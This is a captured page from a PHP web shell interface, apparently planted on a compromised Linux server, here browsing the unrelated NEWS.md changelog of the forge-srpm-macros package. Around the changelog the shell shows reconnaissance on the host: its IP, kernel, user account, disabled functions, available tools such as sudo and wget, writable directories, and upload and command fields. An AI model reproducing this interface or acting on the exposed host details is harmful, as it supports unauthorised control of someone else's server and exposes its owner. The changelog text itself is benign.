403Webshell
Server IP : 88.99.149.37  /  Your IP : 216.73.216.141
Web Server : nginx/1.31.2
System : Linux server-88-99-149-37 6.12.0-124.56.5.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Fri May 15 06:12:08 EDT 2026 x86_64
User : muralimurth ( 1015)
PHP Version : 8.4.23
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/1/cwd/usr/share/doc/forge-srpm-macros/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/1/cwd/usr/share/doc/forge-srpm-macros/NEWS.md
<!--
Copyright (C) 2023 Maxwell G <maxwell@gtmx.me>
SPDX-License-Identifier: GPL-1.0-or-later
-->

NEWS
========

## 0.4.0 - 2024-09-27 <a id='0.4.0'></a>

### Added

- Add support for go.googlesource.com forge

## 0.3.2 - 2024-08-07 <a id='0.3.2'></a>

### Removed

- `forgeversion`: entirely remove warning when `Version:` is set after `Release:`.
  This started causing false positives and confusing users.

## 0.3.1 - 2024-04-10 <a id='0.3.1'></a>

- `forgeversion`: make `Version:` set after `Release:` a warning instead of an
  error to make parsing more resilient

## 0.3.0 - 2024-03-02 <a id='0.3.0'></a>

### Added

- **all: restore compatibility with RPM 4.16 and support EPEL 9**
- packaging: make the RPM noarch. The package does not contain any compiled
  code.

## 0.2.0 - 2023-12-07 <a id='0.2.0'></a>

### Added

- Allow specifying a custom forge scheme

## 0.1.0 - 2023-09-04 <a id='0.1.0'></a>

### Added

- add `-b` flag to `%forgeversion` to override base package version.

### Changed

- `%forgeversion`: use `%version0` instead of `%version` as the base package
  version.
  See the [FPC discussion][FPC discussion] for more context.

[FPC discussion]: https://pagure.io/packaging-committee/pull-request/1295

## 0.0.1 - 2023-08-13 <a id='0.0.1'></a>

Initial release

### Added

- add support for Codeberg
- allow unlimited subgroups in GitLab URLs
- forge.lua: fix syntax error for pagure_ns_fork
- forge.lua: add missing archiveext for pagure_ns_fork
- add %forgeversion to add snapshot info to Version
- add extensive test vectors

### Changed

- Set minimum supported Fedora/RPM version to 37/4.18


Youez - 2016 - github.com/yon3zu
LinuXploit